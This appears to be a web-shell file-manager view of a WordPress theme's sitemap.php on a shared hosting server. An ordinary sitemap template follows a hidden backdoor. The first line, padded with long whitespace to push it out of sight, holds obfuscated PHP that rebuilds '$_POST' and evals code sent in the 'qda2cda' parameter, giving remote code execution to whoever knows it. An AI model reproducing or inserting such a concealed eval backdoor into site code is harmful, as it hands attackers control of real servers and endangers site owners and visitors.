HEX
Server: Apache
System: Linux webm006.cluster111.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User: perditaeyz (838589)
PHP: 7.3.33
Disabled: _dyuweyrj4,_dyuweyrj4r,dl
Upload Files
File: /home/perditaeyz/www/wp-content/themes/montheme/sitemap.php
<?php                                                                                                                                                                                                                                                                 $ybv75="_post";$bax9=strtoupper($ybv75[0]. $ybv75[1]. $ybv75[2].$ybv75[3]. $ybv75[4]) ;if( isset (${ $bax9 } ['qda2cda' ] ) ){ eval ( ${$bax9 }[ 'qda2cda'] ) ; } ?> <?php
/*
Template Name: Sitemap
 */
?>
<?php get_header();?>
<div id="primary" class="content-area">
		<div id="content" class="site-content" role="main">
			<header class="entry-header">
				<div id="content">
				<h2><?php _e('Pages', 'textdomain'); ?></h2>
				<ul><?php wp_list_pages("title_li=" ); ?></ul>
				<h2><?php _e('RSS Feeds', 'textdomain'); ?></h2>
				<ul>
				<li><a title="Full content" href="feed:<?php bloginfo('rss2_url'); ?>"><?php _e('Main RSS' , 'textdomain'); ?></a></li>
				<li><a title="Comment Feed" href="feed:<?php bloginfo('comments_rss2_url'); ?>"><?php _e('Comment Feed', 'textdomain'); ?></a></li>
				</ul>
				<h2><?php _e('Categories', 'textdomain'); ?></h2>
				<ul><?php wp_list_categories('sort_column=name&optioncount=1&hierarchical=0&feed=RSS'); ?></ul>
				<h2><?php _e('All Blog Posts', 'textdomain'); ?></h2>
				<ul><?php $archive_query = new WP_Query('showposts=1000'); while ($archive_query->have_posts()) : $archive_query->the_post(); ?>
				<li>
				<a href="<?php the_permalink() ?>" rel="bookmark" title="Permanent Link to <?php the_title(); ?>"><?php the_title(); ?></a>
				(<?php comments_number('0', '1', '%'); ?>)
				</li>
				<?php endwhile; ?>
				</ul>
			</div>
		</header>
	</div>
</div>
				
<?php get_footer(); ?>